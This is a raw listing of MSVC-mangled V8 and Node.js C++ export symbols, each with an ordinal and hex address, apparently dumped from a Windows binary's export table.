                                  ?AsJSON@compiler@internal@v8@@YA?AUGraphAsJSON@123@AEBVGraph@123@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@@Z29490x140e4eda0
                                  ?AsJSON@compiler@internal@v8@@YA?AUNodeOriginAsJSON@123@AEBVNodeOrigin@123@@Z29500x140076a70
                                  ?AsJSON@compiler@internal@v8@@YA?AUSourcePositionAsJSON@123@AEBVSourcePosition@23@@Z29510x140076a70
                                  ?AsJSObject@ObjectRef@compiler@internal@v8@@QEBA?AVJSObjectRef@234@XZ29520x140dd9f10
                                  ?AsJSReceiver@ObjectRef@compiler@internal@v8@@QEBA?AVJSReceiverRef@234@XZ29530x140dd9f50
                                  ?AsJSRegExp@ObjectRef@compiler@internal@v8@@QEBA?AVJSRegExpRef@234@XZ29540x140dda030
                                  ?AsJSTypedArray@ObjectRef@compiler@internal@v8@@QEBA?AVJSTypedArrayRef@234@XZ29550x140dda220
                                  ?AsJavaScript@FrameSummary@internal@v8@@QEBAAEBVJavaScriptFrameSummary@123@XZ29560x1400769f0
                                  ?AsMap@ObjectRef@compiler@internal@v8@@QEBA?AVMapRef@234@XZ29570x140dda420
                                  ?AsModuleScope@Scope@internal@v8@@QEAAPEAVModuleScope@23@XZ29580x1400769f0
                                  ?AsModuleScope@Scope@internal@v8@@QEBAPEBVModuleScope@23@XZ29590x1400769f0
                                  ?AsName@ObjectRef@compiler@internal@v8@@QEBA?AVNameRef@234@XZ29600x140dda500
                                  ?AsNativeContext@ObjectRef@compiler@internal@v8@@QEBA?AVNativeContextRef@234@XZ29610x140dda610
                                  ?AsObjectBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVObjectBoilerplateDescriptionRef@234@XZ29620x140dd8290
                                  ?AsOtherNumberConstant@Type@compiler@internal@v8@@QEBAPEBVOtherNumberConstantType@234@XZ29630x1400769d0
                                  ?AsOverloadedFunctionType@AsmCallableType@wasm@internal@v8@@UEAAPEAVAsmOverloadedFunctionType@234@XZ29640x140077dc0
                                  ?AsOverloadedFunctionType@AsmOverloadedFunctionType@wasm@internal@v8@@UEAAPEAV1234@XZ29650x1400769f0
                                  ?AsOverloadedFunctionType@AsmType@wasm@internal@v8@@QEAAPEAVAsmOverloadedFunctionType@234@XZ29660x140a62d60
                                  ?AsPropertyCell@ObjectRef@compiler@internal@v8@@QEBA?AVPropertyCellRef@234@XZ29670x140dda6f0
                                  ?AsRange@Type@compiler@internal@v8@@QEBAPEBVRangeType@234@XZ29680x1400769d0
                                  ?AsScopeInfo@ObjectRef@compiler@internal@v8@@QEBA?AVScopeInfoRef@234@XZ29690x140dda800
                                  ?AsScriptContextTable@ObjectRef@compiler@internal@v8@@QEBA?AVScriptContextTableRef@234@XZ29700x140dda840
                                  ?AsSharedFunctionInfo@ObjectRef@compiler@internal@v8@@QEBA?AVSharedFunctionInfoRef@234@XZ29710x140dda920
                                  ?AsSmi@ObjectRef@compiler@internal@v8@@QEBAHXZ29720x140dda960
                                  ?AsSourceTextModule@ObjectRef@compiler@internal@v8@@QEBA?AVSourceTextModuleRef@234@XZ29730x140ddaa10
                                  ?AsString@ObjectRef@compiler@internal@v8@@QEBA?AVStringRef@234@XZ29740x140ddac00
                                  ?AsSymbol@ObjectRef@compiler@internal@v8@@QEBA?AVSymbolRef@234@XZ29750x140ddac40
                                  ?AsTemplateObjectDescription@ObjectRef@compiler@internal@v8@@QEBA?AVTemplateObjectDescriptionRef@234@XZ29760x140ddad90
                                  ?AsTuple@Type@compiler@internal@v8@@QEBAPEBVTupleType@234@XZ29770x1400769d0
                                  ?AsUnion@Type@compiler@internal@v8@@AEBAPEBVUnionType@234@XZ29780x1400769d0
                                  ?AsUnionForTesting@Type@compiler@internal@v8@@QEAAPEBVUnionType@234@XZ29790x140459490
                                  ?AsUnsigned@AsmJsScanner@internal@v8@@QEBAIXZ29800x140a66a20
                                  ?AsValueType@AsmType@wasm@internal@v8@@QEAAPEAVAsmValueType@234@XZ29810x140a62d80
                                  ?AsWasm@FrameSummary@internal@v8@@QEBAAEBVWasmFrameSummary@123@XZ29820x1400769f0
                                  ?AsanNew@Zone@internal@v8@@QEAAPEAX_K@Z29830x140515020
                                  ?AsmjsSignature@WasmOpcodes@wasm@internal@v8@@SAPEBV?$Signature@VValueType@wasm@internal@v8@@@34@W4WasmOpcode@234@@Z29840x14051bd40
                                  ?AssembleArchBinarySearchSwitch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z29850x14047d670
                                  ?AssembleArchBinarySearchSwitchRange@CodeGenerator@compiler@internal@v8@@AEAAXVRegister@34@VRpoNumber@234@PEAU?$pair@HPEAVLabel@internal@v8@@@std@@2@Z29860x140e47f10
                                  ?AssembleArchBoolean@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z29870x14047d9d0
                                  ?AssembleArchBranch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAUBranchInfo@234@@Z29880x14047dae0
                                  ?AssembleArchDeoptBranch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAUBranchInfo@234@@Z29890x14047db90
                                  ?AssembleArchInstruction@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEAVInstruction@234@@Z29900x14047dd10
                                  ?AssembleArchJump@CodeGenerator@compiler@internal@v8@@AEAAXVRpoNumber@234@@Z29910x140492930
                                  ?AssembleArchTableSwitch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z29920x140492980
                                  ?AssembleArchTrap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z29930x140492c80
                                  ?AssembleBlock@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEBVInstructionBlock@234@@Z29940x140e48070
                                  ?AssembleBranchPoisoning@CodeGenerator@compiler@internal@v8@@AEAAXW4FlagsCondition@234@PEAVInstruction@234@@Z29950x140492d70
                                  ?AssembleCode@CodeGenerator@compiler@internal@v8@@QEAAXXZ29960x140e48400
                                  ?AssembleCodeStartRegisterCheck@CodeGenerator@compiler@internal@v8@@AEAAXXZ29970x140492de0
                                  ?AssembleConstructFrame@CodeGenerator@compiler@internal@v8@@AEAAXXZ29980x140492e30
                                  ?AssembleDeconstructFrame@CodeGenerator@compiler@internal@v8@@AEAAXXZ29990x140493440
                                  ?AssembleDeoptimizerCall@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEAVDeoptimizationExit@234@@Z30000x140e49540
                                  ?AssembleGaps@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z30010x140e49620
                                  ?AssembleInstruction@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@HPEBVInstructionBlock@234@@Z30020x140e49670
                                  ?AssembleJumpTable@CodeGenerator@compiler@internal@v8@@AEAAXPEAPEAVLabel@34@_K@Z30030x140493490
                                  ?AssembleMove@CodeGenerator@compiler@internal@v8@@EEAAXPEAVInstructionOperand@234@0@Z30040x1404934f0
                                  ?AssemblePopArgumentsAdaptorFrame@CodeGenerator@compiler@internal@v8@@AEAAXVRegister@34@000@Z30050x140493dd0
                                  ?AssemblePrepareTailCall@CodeGenerator@compiler@internal@v8@@AEAAXXZ30060x140493ef0
                                  ?AssembleRegisterArgumentPoisoning@CodeGenerator@compiler@internal@v8@@AEAAXXZ30070x140493f70
                                  ?AssembleReturn@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstructionOperand@234@@Z30080x140493fe0
                                  ?AssembleSourcePosition@CodeGenerator@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z30090x140e499f0
                                  ?AssembleSourcePosition@CodeGenerator@compiler@internal@v8@@QEAAXVSourcePosition@34@@Z30100x140e49a50
                                  ?AssembleSwap@CodeGenerator@compiler@internal@v8@@EEAAXPEAVInstructionOperand@234@0@Z30110x1404943d0
                                  ?AssembleTailCallAfterGap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@H@Z30120x140494a30
                                  ?AssembleTailCallBeforeGap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@H@Z30130x140494ac0
                                  ?Assert@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB30140x141cdcc38
                                  ?Assert@TurboAssembler@internal@v8@@QEAAXW4Condition@23@W4AbortReason@23@@Z30150x140497110
                                  ?AssertBoundFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30160x140497170
                                  ?AssertConstructor@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30170x140497250
                                  ?AssertDebugContext@Debug@internal@v8@@AEAAXXZ30180x1400768e0
                                  ?AssertFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30190x140497380
                                  ?AssertGeneratorObject@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30200x140497460
                                  ?AssertHeld@Mutex@base@v8@@QEBAXXZ30210x1400768e0
                                  ?AssertHeldAndUnmark@Mutex@base@v8@@AEAAXXZ30220x1400768e0
                                  ?AssertNoLegacyTypes@FeedbackVector@internal@v8@@SAXVMaybeObject@23@@Z30230x1400768e0
                                  ?AssertNotSmi@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30240x1404975a0
                                  ?AssertSmi@MacroAssembler@internal@v8@@QEAAXVOperand@23@@Z30250x140497600
                                  ?AssertSmi@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30260x140497680
                                  ?AssertType@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@@Z30270x140ebbba0
                                  ?AssertUndefinedOrAllocationSite@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z30280x1404976e0
                                  ?AssertUnheld@Mutex@base@v8@@QEBAXXZ30290x1400768e0
                                  ?AssertUnheldAndMark@Mutex@base@v8@@AEAAXXZ30300x1400768e0
                                  ?AssertUnreachable@TurboAssembler@internal@v8@@QEAAXW4AbortReason@23@@Z30310x1404977f0
                                  ?AssertZeroExtended@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z30320x140497800
                                  ?AssignBignum@Bignum@internal@v8@@QEAAXAEBV123@@Z30330x140847c20
                                  ?AssignDecimalString@Bignum@internal@v8@@QEAAXV?$Vector@$$CBD@23@@Z30340x140847cb0
                                  ?AssignHexString@Bignum@internal@v8@@QEAAXV?$Vector@$$CBD@23@@Z30350x140847fa0
                                  ?AssignPowerUInt16@Bignum@internal@v8@@QEAAXGH@Z30360x140848170
                                  ?AssignRange@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@PEAVNativeModule@234@@Z30370x14056eef0
                                  ?AssignUInt16@Bignum@internal@v8@@QEAAXG@Z30380x140848380
                                  ?AssignUInt64@Bignum@internal@v8@@QEAAX_K@Z30390x1408483e0
                                  ?AsyncCompile@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@AEBVWasmFeatures@234@V?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@std@@AEBUModuleWireBytes@234@_NPEBD@Z30400x14055d2f0
                                  ?AsyncFunctionEnter@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ30410x140eabf00
                                  ?AsyncFunctionReject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ30420x140eabf10
                                  ?AsyncFunctionResolve@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ30430x140eabf20
                                  ?AsyncHooksGetExecutionAsyncId@node@@YANPEAVIsolate@v8@@@Z30440x1402462c0
                                  ?AsyncHooksGetTriggerAsyncId@node@@YANPEAVIsolate@v8@@@Z30450x1402462f0
                                  ?AsyncInstantiate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@V?$unique_ptr@VInstantiationResultResolver@wasm@internal@v8@@U?$default_delete@VInstantiationResultResolver@wasm@internal@v8@@@std@@@std@@V?$Handle@VWasmModuleObject@internal@v8@@@34@V?$MaybeHandle@VJSReceiver@internal@v8@@@34@@Z30460x14055d670
                                  ?AsyncIteratorSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ30470x14088f390
                                  ?AtExit@node@@YAXP6AXPEAX@Z0@Z30480x140246320
                                  ?AtExit@node@@YAXPEAVEnvironment@1@P6AXPEAX@Z1@Z30490x140246370
                                  ?AtLoopHeader@ResumeJumpTarget@compiler@internal@v8@@SA?AV1234@HAEBV1234@@Z30500x140ea0370
                                  ?AtPut@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z30510x14076ebf0
                                  ?AtPut@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z30520x14076ed60
                                  ?AtPut@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@IV?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z30530x14076eef0
                                  ?AtPut@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@IV?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z30540x14076f0b0
                                  ?AtomicAdd@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30550x140e69690
                                  ?AtomicAdd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30560x140e696a0
                                  ?AtomicAnd@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30570x140e69750
                                  ?AtomicAnd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30580x140e69760
                                  ?AtomicCompareExchange@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11111@Z30590x140e69810
                                  ?AtomicCompareExchange@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11111@Z30600x140e69860
                                  ?AtomicExchange@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30610x140e69930
                                  ?AtomicExchange@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30620x140e69940
                                  ?AtomicLoad@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@1@Z30630x140e699f0
                                  ?AtomicLoad@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@1@Z30640x140e69a80
                                  ?AtomicOr@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30650x140e69af0
                                  ?AtomicOr@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30660x140e69b00
                                  ?AtomicStore@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4MachineRepresentation@34@PEAV5234@111@Z30670x140e69bb0
                                  ?AtomicStore@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4MachineRepresentation@34@PEAV5234@111@Z30680x140e69bc0
                                  ?AtomicSub@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30690x140e69c70
                                  ?AtomicSub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30700x140e69c80
                                  ?AtomicXor@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30710x140e69d30
                                  ?AtomicXor@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z30720x140e69d40
                                  ?Attach@JSArrayBuffer@internal@v8@@QEAAXV?$shared_ptr@VBackingStore@internal@v8@@@std@@@Z30730x1407e7630
                                  ?AttachDeoptInlinedFrames@ProfilerListener@internal@v8@@AEAAXV?$Handle@VCode@internal@v8@@@23@PEAVCodeDeoptEventRecord@23@@Z30740x1406d1430
                                  ?AttachOrEmitDeferredSourceInfo@BytecodeArrayBuilder@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@@Z30750x14088f3a0
                                  ?AttachSharedWasmMemoryObject@BackingStore@internal@v8@@QEAAXPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@@Z30760x14083e830
                                  ?AttachToNext@LiveRange@compiler@internal@v8@@QEAAXXZ30770x140ef2850
                                  ?AutomaticallyRestoreInitialHeapLimit@Heap@internal@v8@@QEAAXN@Z30780x140929ac0
                                  ?AutomaticallyRestoreInitialHeapLimit@Isolate@v8@@QEAAXN@Z30790x140a79a90
                                  ?Available@LargeObjectSpace@internal@v8@@UEAA_KXZ30800x140077dc0
                                  ?Available@NewSpace@internal@v8@@UEAA_KXZ30810x140421a10
                                  ?Available@PagedSpace@internal@v8@@UEAA_KXZ30820x14041ac90
                                  ?AverageMarkCompactMutatorUtilization@GCTracer@internal@v8@@QEBANXZ30830x14093f750
                                  ?AverageSpeed@GCTracer@internal@v8@@CANAEBV?$RingBuffer@U?$pair@_KN@std@@@base@3@@Z30840x14093f780
                                  ?AverageSpeed@GCTracer@internal@v8@@CANAEBV?$RingBuffer@U?$pair@_KN@std@@@base@3@AEBU?$pair@_KN@std@@N@Z30850x14093f810
                                  ?AverageSurvivalRatio@GCTracer@internal@v8@@QEBANXZ30860x14093f890
                                  ?AverageTimeToIncrementalMarkingTask@GCTracer@internal@v8@@QEBANXZ30870x14093f9b0
                                  ?Backtrack@RegExpBytecodeGenerator@internal@v8@@UEAAXXZ30880x1406c8e90
                                  ?Backtrack@RegExpMacroAssemblerX64@internal@v8@@UEAAXXZ30890x140443450
                                  ?Bailout@PreparseDataBuilder@internal@v8@@QEAAXXZ30900x140421a70
                                  ?BailoutIfDeoptimized@CodeGenerator@compiler@internal@v8@@AEAAXXZ30910x140494d50
                                  ?BaseRecordWrite@IncrementalMarking@internal@v8@@QEAA_NVHeapObject@23@0@Z30920x1408d17a0
                                  ?BasicBlockCount@Schedule@compiler@internal@v8@@QEBA_KXZ30930x1404594a0
                                  ?BeginArray@TracedValue@tracing@v8@@QEAAXPEBD@Z30940x1400c8b30
                                  ?BeginArray@TracedValue@tracing@v8@@QEAAXXZ30950x1405f54e0
                                  ?BeginDictionary@TracedValue@tracing@v8@@QEAAXPEBD@Z30960x1400c8b90
                                  ?BeginDictionary@TracedValue@tracing@v8@@QEAAXXZ30970x1405f5580
                                  ?BeginFinally@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ30980x14086c900
                                  ?BeginHandler@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ30990x14086c950
                                  ?BeginRegion@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4RegionObservability@234@@Z31000x140e095e0
                                  ?BeginTry@TryCatchBuilder@interpreter@internal@v8@@QEAAXVRegister@234@@Z31010x14086c980
                                  ?BeginTry@TryFinallyBuilder@interpreter@internal@v8@@QEAAXVRegister@234@@Z31020x14086c980
                                  ?BigInt64Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31030x140421a80
                                  ?BigInt64Array_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31040x140727630
                                  ?BigInt@Type@compiler@internal@v8@@SA?AV1234@XZ31050x1404594b0
                                  ?BigIntAdd@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z31060x140ff9c00
                                  ?BigIntAdd@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31070x140ebbc40
                                  ?BigIntAsUintN@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z31080x140ff9c30
                                  ?BigIntAsUintN@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z31090x140ebbc50
                                  ?BigIntMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ31100x140ea6840
                                  ?BigIntMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ31110x140ec2d10
                                  ?BigIntNegate@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z31120x140ff9c40
                                  ?BigIntNegate@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31130x140ebbd20
                                  ?BigIntSubtract@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z31140x140ff9c00
                                  ?BigIntSubtract@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31150x140ebbd30
                                  ?BigInt_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31160x140421a90
                                  ?BigInt_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31170x140727640
                                  ?BigUint64Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31180x140421aa0
                                  ?BigUint64Array_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31190x140727650
                                  ?BigitAt@Bignum@internal@v8@@AEBAIH@Z31200x1408484a0
                                  ?BigitLength@Bignum@internal@v8@@AEBAHXZ31210x140840310
                                  ?BigitsShiftLeft@Bignum@internal@v8@@AEAAXH@Z31220x1408484d0
                                  ?BignumDtoa@internal@v8@@YAXNW4BignumDtoaMode@12@HV?$Vector@D@12@PEAH2@Z31230x140849690
                                  ?BinaryOpForAssignment@Token@internal@v8@@SA?AW4Value@123@W44123@@Z31240x140421ab0
                                  ?BinaryOperation@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VRegister@234@H@Z31250x14088f400
                                  ?BinaryOperation@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4Operation@23@@Z31260x1409f8fa0
                                  ?BinaryOperationSmiLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VSmi@34@H@Z31270x14088fe20
                                  ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeJumpTable@234@H@Z31280x1408908e0
                                  ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeLabel@234@@Z31290x140890930
                                  ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeLoopHeader@234@@Z31300x140890980
                                  ?Bind@BytecodeLabels@interpreter@internal@v8@@QEAAXPEAVBytecodeArrayBuilder@234@@Z31310x140872c10
                                  ?Bind@CodeAssembler@compiler@internal@v8@@QEAAXPEAVCodeAssemblerLabel@234@@Z31320x140e69df0
                                  ?Bind@CodeAssemblerLabel@compiler@internal@v8@@AEAAXXZ31330x140e69e20
                                  ?Bind@CodeAssemblerVariable@compiler@internal@v8@@QEAAXPEAVNode@234@@Z31340x140e69e50
                                  ?Bind@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVRawMachineLabel@234@@Z31350x140ee1550
                                  ?Bind@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z31360x1406c8ed0
                                  ?Bind@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z31370x1404435a0
                                  ?BindBasicBlock@GraphAssembler@compiler@internal@v8@@IEAAXPEAVBasicBlock@234@@Z31380x140ec2d70
                                  ?BindBreakTarget@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXXZ31390x14086c990
                                  ?BindContinueTarget@LoopBuilder@interpreter@internal@v8@@QEAAXXZ31400x14086c9a0
                                  ?BindExceptionHandler@TurboAssembler@internal@v8@@QEAAXPEAVLabel@23@@Z31410x1404360c0
                                  ?BindHandlerTarget@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z31420x140889030
                                  ?BindJumpTableEntry@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeJumpTable@234@H@Z31430x140889060
                                  ?BindLabel@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeLabel@234@@Z31440x1408890b0
                                  ?BindLoopEnd@LoopBuilder@interpreter@internal@v8@@AEAAXXZ31450x14086c9b0
                                  ?BindLoopHeader@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeLoopHeader@234@@Z31460x1408890f0
                                  ?BindToCurrentContext@UnboundScript@v8@@QEAA?AV?$Local@VScript@v8@@@2@XZ31470x140a79b20
                                  ?BindTryRegionEnd@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z31480x140889110
                                  ?BindTryRegionStart@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z31490x140889130
                                  ?BitcastFloat32ToInt32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$SloppyTNode@UFloat32T@internal@v8@@@34@@Z31500x140e69e60
                                  ?BitcastFloat32ToInt32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31510x140ec2dc0
                                  ?BitcastFloat32ToInt32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31520x140e0dd00
                                  ?BitcastFloat32ToInt32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31530x140e69ec0
                                  ?BitcastFloat64ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31540x140ec2e70
                                  ?BitcastFloat64ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31550x140e0ddc0
                                  ?BitcastFloat64ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31560x140e69f00
                                  ?BitcastInt32ToFloat32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat32T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@@Z31570x140e69f40
                                  ?BitcastInt32ToFloat32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31580x140ec2f20
                                  ?BitcastInt32ToFloat32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31590x140e0de80
                                  ?BitcastInt32ToFloat32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31600x140e69fa0
                                  ?BitcastInt64ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31610x140ec2fd0
                                  ?BitcastInt64ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31620x140e0df40
                                  ?BitcastInt64ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31630x140e69fe0
                                  ?BitcastMaybeObjectToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$SloppyTNode@VMaybeObject@internal@v8@@@34@@Z31640x140e6a020
                                  ?BitcastMaybeObjectToWord@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31650x140e0e000
                                  ?BitcastMaybeObjectToWord@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31660x140e6a080
                                  ?BitcastTaggedToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$SloppyTNode@VObject@internal@v8@@@34@@Z31670x140e6a0c0
                                  ?BitcastTaggedToWord@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31680x140ec3080
                                  ?BitcastTaggedToWord@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31690x140e0e0d0
                                  ?BitcastTaggedToWord@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31700x140e6a120
                                  ?BitcastTaggedToWordForTagAndSmiBits@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$SloppyTNode@U?$UnionT@VObject@internal@v8@@VMaybeObject@23@@internal@v8@@@34@@Z31710x140e6a160
                                  ?BitcastTaggedToWordForTagAndSmiBits@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31720x140ec3140
                                  ?BitcastTaggedToWordForTagAndSmiBits@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ31730x140e0e1a0
                                  ?BitcastTaggedToWordForTagAndSmiBits@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z31740x140e6a1c0
